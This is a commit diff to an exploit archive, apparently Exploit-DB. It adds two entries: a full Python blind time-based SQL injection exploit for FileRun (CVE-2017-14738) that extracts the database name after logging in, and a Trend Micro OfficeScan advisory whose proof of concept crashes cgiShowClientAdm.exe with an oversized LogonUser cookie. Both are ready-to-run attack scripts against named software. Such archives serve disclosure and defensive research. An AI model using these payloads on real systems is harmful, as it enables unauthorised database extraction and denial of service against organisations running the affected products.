DB: 2017-09-30

2 new exploits Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption FileRun <= 2017.09.18 - SQL Injection
2017-09-30 05:01:29 +00:00 · 2017-09-30 05:01:29 +00:00 · b15ad9d0bc
commit b15ad9d0bc
parent a92226f6ac
3 changed files with 211 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5689,6 +5689,7 @@ id,file,description,date,author,platform,type,port
 42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0
 42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
 42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0
+42920,platforms/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -38600,3 +38601,4 @@ id,file,description,date,author,platform,type,port
 42895,platforms/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,php,webapps,0
 42916,platforms/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps,0
 42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0
+42922,platforms/php/webapps/42922.py,"FileRun <= 2017.09.18 - SQL Injection",2017-09-29,SPARC,php,webapps,0
--- a/platforms/php/webapps/42922.py
+++ b/platforms/php/webapps/42922.py
@ -0,0 +1,100 @@
+#!/usr/bin/env python
+# Exploit Title: FileRun <=2017.09.18
+# Date: September 29, 2017
+# Exploit Author: SPARC
+# Vendor Homepage: https://www.filerun.com/
+# Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t
+# Version: 2017.09.18
+# Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0
+# CVE : CVE-2017-14738
+# 
+
+import sys,time,urllib,urllib2,cookielib
+from time import sleep
+
+print """
+#===============================================================#
+|                                                               |
+|            ___|                   |                           |
+|          \___ \  __ \   _ \ __ \  __|  _ \  __| _` |          |
+|                | |   |  __/ |   | |    __/ |   (   |          |
+|          _____/  .__/ \___|_|  _|\__|\___|_|  \__,_|          |
+|                 _|                                            |
+|                                                               |
+|                   FileRun <= 2017.09.18                       |
+|       BlindSQLi Proof of Concept (Post Authentication)        |          
+|        by Spentera Research (research[at]spentera.id)         |
+|                                                               |
+#===============================================================#
+"""
+
+
+host = raw_input("[*] Target IP: ")
+username = raw_input("[*] Username: ")
+password = raw_input("[*] Password: ")
+target = 'http://%s/?module=search&section=ajax&page=grid' %(host)
+delay=1
+global cookie,data
+
+
+
+def masuk(usr,pswd):
+    log_data = {
+        'username': usr,
+        'password': pswd
+    }
+ 
+    post_data = urllib.urlencode(log_data)
+    cookjar = cookielib.CookieJar()
+    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar))
+    try:	
+    	req = urllib2.Request('http://%s/?module=fileman&page=login&action=login'%(host), post_data)
+    	content = opener.open(req)
+    	global data,cookie
+    	data = dict((cookie.name, cookie.value) for cookie in cookjar)
+    	cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID']))
+    	return str(content.read())
+    except:                                             
+    	print '\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL'                
+    	sys.exit(0)
+
+def konek(m,n):
+	#borrow from SQLmap :)
+	query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n))
+	values = { 'metafield': query,             
+        	   'searchType': 'meta',
+        	   'keyword': 'work',
+        	   'searchPath': '/ROOT/HOME',
+	           'path': '/ROOT/SEARCH' }
+	 
+	req = urllib2.Request(target, urllib.urlencode(values))                         
+	req.add_header('Cookie', cookie)  
+	try:                                        
+    		starttime=time.time()
+    		response = 	urllib2.urlopen(req)
+    		endtime = time.time()
+    		return int(endtime-starttime)
+ 
+	except:                                             
+    		print '\n[-] Uh oh! Exploit fail..'                
+    		sys.exit(0)
+
+print "[+] Logging in to the application..."
+sleep(1)
+cekmasuk = masuk(username,password)
+if u'success' in cekmasuk:
+	print "[*] Using Time-Based method with %ds delay."%int(delay)
+	print "[+] Starting to dump current database. This might take time.."
+	sys.stdout.write('[+] Target current database is: ')
+	sys.stdout.flush()
+
+	starttime = time.time()
+	for m in range(1,256):
+		for n in range(32,126):
+			wkttunggu = konek(m,n)		
+			if (wkttunggu < delay):				
+				sys.stdout.write(chr(n))
+				sys.stdout.flush()
+				break
+	endtime = time.time()
+	print "\n[+] Done in %d seconds" %int(endtime-starttime)
--- a/platforms/windows/dos/42920.py
+++ b/platforms/windows/dos/42920.py
@ -0,0 +1,109 @@
+[+] Credits: John Page (aka hyp3rlinx)	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt
+[+] ISR: ApparitionSec           
+ 
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan 
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+Vulnerability Type:
+===================
+Unauthorized Remote Memory Corruption
+
+
+
+CVE Reference:
+==============
+CVE-2017-14089
+
+
+
+Security Issue:
+================
+Remote unauthenticated attackers that can make connection the TrendMicro OfficeScan XG application targeting the "cgiShowClientAdm.exe"
+process can cause memory corruption issues.
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+
+Exploit/POC:
+=============
+import urllib,urllib2
+from urllib2 import Request
+
+print 'TrendMicro OfficeScan XG'
+print 'Stack Memory Corruption POC'
+print 'by hyp3rlinx\n'
+
+IP="VICTIM-IP:4343"
+
+PAYLOAD="A"*256
+
+url = urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe')
+cookie="Cookie: serror=0; session_expired=no; FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|; stamp=2231521137; timestamp=1497360567; DisabledIds=9999.; LogonUser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666; LANG=en_US; PHPSESSID=WHATEVER123; lastID=34; lastTab=-1; theme=default; wf_CSRF_token=99999999999999999999999999999999; serror=0; retry=0; PHPSESSID=WHATEVERHERE; wf_CSRF_token=666; LANG=en_US; theme=default; lastID=33; lastTab=-1"
+
+print '\nsending packetz... \n'+ cookie
+
+##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411")        #<============== X-CSRFToken IS NOT EVEN NEEDED!
+url.add_header("Content-Type", "application/x-www-form-urlencoded; charset=utf-8")
+url.add_header("Content-Length", "54")
+url.add_header("Cookie ",cookie)
+
+req=urllib2.urlopen(url)
+res = urllib2.urlopen(req)
+print res
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+====================
+Vendor Notification:  June 5, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx